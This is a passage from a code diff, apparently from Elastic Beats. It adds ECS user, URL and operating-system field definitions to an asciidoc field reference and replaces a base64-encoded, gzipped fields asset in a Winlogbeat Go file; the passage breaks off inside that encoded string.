windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -7683,6 +7722,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -7858,6 +7898,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -7868,6 +8021,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -7971,6 +8237,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -8087,6 +8466,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- diff --git a/winlogbeat/include/fields.go b/winlogbeat/include/fields.go index 37f77acf315b..ee7ef95c22b7 100644 --- a/winlogbeat/include/fields.go +++ b/winlogbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetBuildFieldsFieldsCommonYml returns asset data. // This is the base64 encoded gzipped contents of build/fields/fields.common.yml. func AssetBuildFieldsFieldsCommonYml() string { - return "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